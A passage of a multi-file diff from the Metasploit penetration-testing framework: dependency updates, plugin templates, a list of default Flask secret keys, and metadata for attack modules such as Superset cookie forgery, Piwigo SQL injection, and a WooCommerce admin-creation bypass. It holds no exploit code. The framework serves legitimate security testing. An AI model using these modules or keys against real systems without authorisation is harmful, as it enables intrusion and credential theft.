 net-protocol, 0.2.1, "ruby, Simplified BSD"
 net-smtp, 0.3.3, "ruby, Simplified BSD"
 net-ssh, 7.1.0, MIT
-network_interface, 0.0.2, MIT
+network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.9, MIT
 nokogiri, 1.14.5, MIT
@@ -99,7 +107,7 @@ octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
-packetfu, 1.1.13, BSD
+packetfu, 2.0.0, "New BSD"
 parallel, 1.23.0, MIT
 parser, 3.2.2.3, MIT
 patch_finder, 1.0.2, "New BSD"
@@ -125,6 +133,7 @@ recog, 3.1.1, unknown
 redcarpet, 3.6.0, MIT
 regexp_parser, 2.8.0, MIT
 reline, 0.3.5, ruby
+require_all, 3.0.0, MIT
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.31, "New BSD"
@@ -138,7 +147,7 @@ rex-powershell, 0.1.97, "New BSD"
 rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.52, "New BSD"
+rex-socket, 0.1.54, "New BSD"
 rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
 rex-text, 0.2.52, "New BSD"
@@ -155,6 +164,7 @@ rspec-support, 3.12.0, MIT
 rubocop, 1.52.0, MIT
 rubocop-ast, 1.29.0, MIT
 ruby-macho, 3.0.0, MIT
+ruby-mysql, 4.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
@@ -171,11 +181,13 @@ sqlite3, 1.6.3, "New BSD"
 sshkey, 2.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
+systemu, 2.6.5, ruby
+test-prof, 1.2.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
 thor, 1.2.2, MIT
 tilt, 2.2.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.2, "ruby, Simplified BSD"
+timeout, 0.4.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2023.3, MIT
@@ -183,6 +195,7 @@ unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.4.2, MIT
 unix-crypt, 1.3.1, 0BSD
+uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
 webrick, 1.8.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
@@ -91,8 +91,8 @@ begin
  }
  invalidate_bootsnap_cache!(bootsnap_config)
  Bootsnap.setup(**bootsnap_config)
-rescue
-  $stderr.puts 'Warning: Failed bootsnap cache setup'
+rescue => e
+  $stderr.puts "Warning: Failed bootsnap cache setup - #{e.class} #{e} #{e.backtrace}"
  begin
    FileUtils.rm_rf(cache_dir, secure: true)
  rescue
@@ -0,0 +1,15 @@
+---
+info:
+  title: Metasploit Framework
+  description: Metasploit Framework
+  x-cortex-git:
+    github:
+      alias: r7org
+      repository: rapid7/metasploit-framework
+  x-cortex-tag: metasploit-framework
+  x-cortex-type: service
+  x-cortex-domain-parents:
+  - tag: metasploit
+openapi: 3.0.1
+servers:
+- url: "/"
@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin changelog</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add changelog content here
+</p>
+</body>
+</html>
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<plugin>
+   <class>com.example.openfire.plugin.Example</class>
+   <name>PLUGINNAME</name>
+   <description>PLUGINDESCRIPTION</description>
+   <author>PLUGINAUTHOR</author>
+   <version>1.0.0</version>
+   <date>7/7/2008</date>
+   <minServerVersion>3.5.0</minServerVersion>
+</plugin>
@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin readme</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add readme content here
+</p>
+</body>
+</html>
@@ -0,0 +1,5 @@
+\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+thisISaSECRET_1234
+YOUR_OWN_RANDOM_GENERATED_SECRET_KEY
+TEST_NON_DEV_SECRET
@@ -57,3 +57,5 @@ woocommerce-abandoned-cart
 elementor
 bookingpress
 paid-memberships-pro
+woocommerce-payments
+file-manager-advanced-shortcode
@@ -3094,7 +3094,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-10-03 19:50:04 +0000",
+    "mod_time": "2023-09-15 16:35:55 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -3111,6 +3111,9 @@
      "SideEffects": [
        "config-changes",
        "ioc-in-logs"
+      ],
+      "RelatedModules": [
+        "exploit/linux/telnet/netgear_telnetenable"
      ]
    },
    "session_types": false,
@@ -3158,7 +3161,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2023-09-15 16:35:55 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -3174,6 +3177,9 @@
      ],
      "Reliability": [

+      ],
+      "RelatedModules": [
+        "exploit/linux/telnet/netgear_telnetenable"
      ]
    },
    "session_types": false,
@@ -5249,7 +5255,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-03-06 12:54:07 +0000",
+    "mod_time": "2023-09-13 15:34:17 +0000",
    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/forge_ticket",
@@ -10855,7 +10861,7 @@
    "needs_cleanup": false
  },
  "auxiliary_cloud/aws/enum_ssm": {
-    "name": "Amazon Web Services EC2 instance enumeration",
+    "name": "Amazon Web Services EC2 SSM enumeration",
    "fullname": "auxiliary/cloud/aws/enum_ssm",
    "aliases": [

@@ -10868,7 +10874,7 @@
    ],
    "description": "Provided AWS credentials, this module will call the authenticated\n          API of Amazon Web Services to list all SSM-enabled EC2 instances\n          accessible to the account. Once enumerated as SSM-enabled, the\n          instances can be controlled using out-of-band WebSocket sessions\n          provided by the AWS API (nominally, privileged out of the box).\n          This module provides not only the API enumeration identifying EC2\n          instances accessible via SSM with given credentials, but enables\n          session initiation for all identified targets (without requiring\n          target-level credentials) using the CreateSession mixin option.\n          The module also provides an EC2 ID filter and a limiting throttle\n          to prevent session stampedes or expensive messes.",
    "references": [
-
+      "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there"
    ],
    "platform": "",
    "arch": "",
@@ -10880,7 +10886,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-05-22 17:11:16 +0000",
+    "mod_time": "2023-08-01 15:02:11 +0000",
    "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb",
    "is_install_path": true,
    "ref_name": "cloud/aws/enum_ssm",
@@ -17510,6 +17516,70 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/apache_superset_cookie_sig_priv_esc": {
+    "name": "Apache Superset Signed Cookie Priv Esc",
+    "fullname": "auxiliary/gather/apache_superset_cookie_sig_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-25",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "paradoxis",
+      "Spencer McIntyre",
+      "Naveen Sunkavally"
+    ],
+    "description": "Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.\n          These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that\n          of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user and retrieve database\n          credentials saved in Apache Superset.",
+    "references": [
+      "URL-https://github.com/Paradoxis/Flask-Unsign",
+      "URL-https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/",
+      "URL-https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/",
+      "URL-https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py",
+      "EDB-51447",
+      "CVE-2023-27524"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-12 15:52:58 +0000",
+    "path": "/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "gather/apache_superset_cookie_sig_priv_esc",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/apple_safari_ftp_url_cookie_theft": {
    "name": "Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft",
    "fullname": "auxiliary/gather/apple_safari_ftp_url_cookie_theft",
@@ -18763,6 +18833,63 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/elasticsearch_enum": {
+    "name": "Elasticsearch Enumeration Utility",
+    "fullname": "auxiliary/gather/elasticsearch_enum",
+    "aliases": [
+      "auxiliary/scanner/elasticsearch/indices_enum"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Silas Cutler <Silas.Cutler@BlackListThisDomain.com>",
+      "h00die"
+    ],
+    "description": "This module enumerates Elasticsearch instances. It uses the REST API\n          in order to gather information about the server, the cluster, nodes,\n          in the cluster, indicies, and pull data from those indicies.",
+    "references": [
+      "URL-https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-24 17:24:20 +0000",
+    "path": "/modules/auxiliary/gather/elasticsearch_enum.rb",
+    "is_install_path": true,
+    "ref_name": "gather/elasticsearch_enum",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/emc_cta_xxe": {
    "name": "EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read",
    "fullname": "auxiliary/gather/emc_cta_xxe",
@@ -20560,7 +20687,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-24 13:50:04 +0000",
+    "mod_time": "2023-08-14 16:14:36 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -21535,6 +21662,178 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/piwigo_cve_2023_26876": {
+    "name": "Piwigo CVE-2023-26876 Gather Credentials via SQL Injection ",
+    "fullname": "auxiliary/gather/piwigo_cve_2023_26876",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-21",
+    "type": "auxiliary",
+    "author": [
+      "rodnt",
+      "Rodolfo Tavares",
+      "Tempest Security, Henrique Arcoverde"
+    ],
+    "description": "This module allows an authenticated user to retrieve the usernames and encrypted passwords of other users in Piwigo through SQL injection using the (filter_user_id) parameter.",
+    "references": [
+      "CVE-2023-26876",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-26876"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-07-14 21:34:32 +0000",
+    "path": "/modules/auxiliary/gather/piwigo_cve_2023_26876.rb",
+    "is_install_path": true,
+    "ref_name": "gather/piwigo_cve_2023_26876",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_gather/prometheus_api_gather": {
+    "name": "Prometheus API Information Gather",
+    "fullname": "auxiliary/gather/prometheus_api_gather",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2016-07-01",
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module utilizes Prometheus' API calls to gather information about\n          the server's configuration, and targets. Fields which may contain\n          credentials, or credential file names are then pulled out and printed.\n\n          Targets may have a wealth of information, this module will print the following\n          values when found:\n          __meta_gce_metadata_ssh_keys, __meta_gce_metadata_startup_script,\n          __meta_gce_metadata_kube_env, kubernetes_sd_configs,\n          _meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration,\n          __meta_ec2_tag_CreatedBy, __meta_ec2_tag_OwnedBy\n\n          Shodan search: \"http.favicon.hash:-1399433489\"",
+    "references": [
+      "URL-https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-15 18:04:59 +0000",
+    "path": "/modules/auxiliary/gather/prometheus_api_gather.rb",
+    "is_install_path": true,
+    "ref_name": "gather/prometheus_api_gather",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_gather/prometheus_node_exporter_gather": {
+    "name": "Prometheus Node Exporter And Windows Exporter Information Gather",
+    "fullname": "auxiliary/gather/prometheus_node_exporter_gather",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2013-04-18",
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This modules connects to a Prometheus Node Exporter or Windows Exporter service\n          and gathers information about the host.\n\n          Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1",
+    "references": [
+      "URL-https://github.com/prometheus/node_exporter",
+      "URL-https://sysdig.com/blog/exposed-prometheus-exploit-kubernetes-kubeconeu/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9100,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-15 15:55:23 +0000",
+    "path": "/modules/auxiliary/gather/prometheus_node_exporter_gather.rb",
+    "is_install_path": true,
+    "ref_name": "gather/prometheus_node_exporter_gather",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/pulse_secure_file_disclosure": {
    "name": "Pulse Secure VPN Arbitrary File Disclosure",
    "fullname": "auxiliary/gather/pulse_secure_file_disclosure",
@@ -21577,7 +21876,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-01-14 00:34:06 +0000",
+    "mod_time": "2023-09-15 16:35:55 +0000",
    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/pulse_secure_file_disclosure",
@@ -21590,6 +21889,9 @@
      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "Reliability": [
+
      ],
      "RelatedModules": [
        "exploit/linux/http/pulse_secure_cmd_exec"
@@ -21598,6 +21900,64 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/python_flask_cookie_signer": {
+    "name": "Python Flask Cookie Signer",
+    "fullname": "auxiliary/gather/python_flask_cookie_signer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-01-26",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "paradoxis",
+      "Spencer McIntyre"
+    ],
+    "description": "This is a generic module which can manipulate Python Flask-based application cookies.\n          The Retrieve action will connect to a web server, grab the cookie, and decode it.\n          The Resign action will do the same as above, but after decoding it, it will replace\n          the contents with that in NEWCOOKIECONTENT, then sign the cookie with SECRET. This\n          cookie can then be used in a browser. This is a Ruby based implementation of some\n          of the features in the Python project Flask-Unsign.",
+    "references": [
+      "URL-https://github.com/Paradoxis/Flask-Unsign"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-12 15:52:58 +0000",
+    "path": "/modules/auxiliary/gather/python_flask_cookie_signer.rb",
+    "is_install_path": true,
+    "ref_name": "gather/python_flask_cookie_signer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/qnap_backtrace_admin_hash": {
    "name": "QNAP NAS/NVR Administrator Hash Disclosure",
    "fullname": "auxiliary/gather/qnap_backtrace_admin_hash",
@@ -21814,6 +22174,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/roundcube_auth_file_read": {
+    "name": "Roundcube TimeZone Authenticated File Disclosure",
+    "fullname": "auxiliary/gather/roundcube_auth_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2017-11-09",
+    "type": "auxiliary",
+    "author": [
+      "joel <joel @ ndepthsecurity>",
+      "stonepresto",
+      "thomascube"
+    ],
+    "description": "Roundcube Webmail allows unauthorized access to arbitrary files on the host's filesystem, including configuration files.\n          This affects all versions from 1.1.0 through version 1.3.2. The attacker must be able to authenticate at the target system\n          with a valid username/password as the attack requires an active session.\n\n          Tested against version 1.3.2",
+    "references": [
+      "EDB-49510",
+      "URL-https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1",
+      "CVE-2017-16651"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-25 08:59:53 +0000",
+    "path": "/modules/auxiliary/gather/roundcube_auth_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/roundcube_auth_file_read",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/safari_file_url_navigation": {
    "name": "Mac OS X Safari file:// Redirection Sandbox Escape",
    "fullname": "auxiliary/gather/safari_file_url_navigation",
@@ -22735,7 +23155,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -24555,53 +24975,6 @@
    "session_types": false,
    "needs_cleanup": false
  },
-  "auxiliary_scanner/elasticsearch/indices_enum": {
-    "name": "ElasticSearch Indices Enumeration Utility",
-    "fullname": "auxiliary/scanner/elasticsearch/indices_enum",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "Silas Cutler <Silas.Cutler@BlackListThisDomain.com>"
-    ],
-    "description": "This module enumerates ElasticSearch Indices. It uses the REST API\n        in order to make it.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 9200,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
-    "is_install_path": true,
-    "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "session_types": false,
-    "needs_cleanup": false
-  },
  "auxiliary_scanner/emc/alphastor_devicemanager": {
    "name": "EMC AlphaStor Device Manager Service",
    "fullname": "auxiliary/scanner/emc/alphastor_devicemanager",
@@ -25856,7 +26229,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-05-26 15:47:22 +0000",
+    "mod_time": "2023-08-17 15:29:20 +0000",
    "path": "/modules/auxiliary/scanner/http/apache_nifi_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_nifi_version",
@@ -28887,6 +29260,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/elasticsearch_memory_disclosure": {
+    "name": "Elasticsearch Memory Disclosure",
+    "fullname": "auxiliary/scanner/http/elasticsearch_memory_disclosure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-07-21",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Eric Howard",
+      "R0NY"
+    ],
+    "description": "This module exploits a memory disclosure vulnerability in Elasticsearch\n          7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary\n          queries to Elasticsearch can generate an error message containing previously\n          used portions of a data buffer.\n          This buffer could contain sensitive information such as Elasticsearch\n          documents or authentication details. This vulnerability's output is similar\n          to heartbleed.",
+    "references": [
+      "EDB-50149",
+      "CVE-2021-22145",
+      "URL-https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-01 20:14:41 +0000",
+    "path": "/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/elasticsearch_memory_disclosure",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/elasticsearch_traversal": {
    "name": "ElasticSearch Snapshot API Directory Traversal",
    "fullname": "auxiliary/scanner/http/elasticsearch_traversal",
@@ -28973,7 +29406,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-09-18 06:56:18 +0000",
    "path": "/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/emby_ssrf_scanner",
@@ -28981,6 +29414,18 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/emby_version_ssrf"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -29021,7 +29466,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-09-18 06:56:18 +0000",
    "path": "/modules/auxiliary/scanner/http/emby_version_ssrf.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/emby_version_ssrf",
@@ -29029,6 +29474,18 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/emby_ssrf_scanner"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -39512,6 +39969,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/wp_woocommerce_payments_add_user": {
+    "name": "Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation",
+    "fullname": "auxiliary/scanner/http/wp_woocommerce_payments_add_user",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-03-22",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Michael Mazzolini",
+      "Julien Ahrens"
+    ],
+    "description": "WooCommerce-Payments plugin for Wordpress versions 4.8', '4.8.2, 4.9', '4.9.1,\n          5.0', '5.0.4, 5.1', '5.1.3, 5.2', '5.2.2, 5.3', '5.3.1, 5.4', '5.4.1,\n          5.5', '5.5.2, and 5.6', '5.6.2 contain an authentication bypass by specifying a valid user ID number\n          within the X-WCPAY-PLATFORM-CHECKOUT-USER header. With this authentication bypass, a user can then use the API\n          to create a new user with administrative privileges on the target WordPress site IF the user ID\n          selected corresponds to an administrator account.",
+    "references": [
+      "URL-https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/",
+      "URL-https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/",
+      "CVE-2023-28121"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-07-09 19:48:16 +0000",
+    "path": "/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/wp_woocommerce_payments_add_user",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
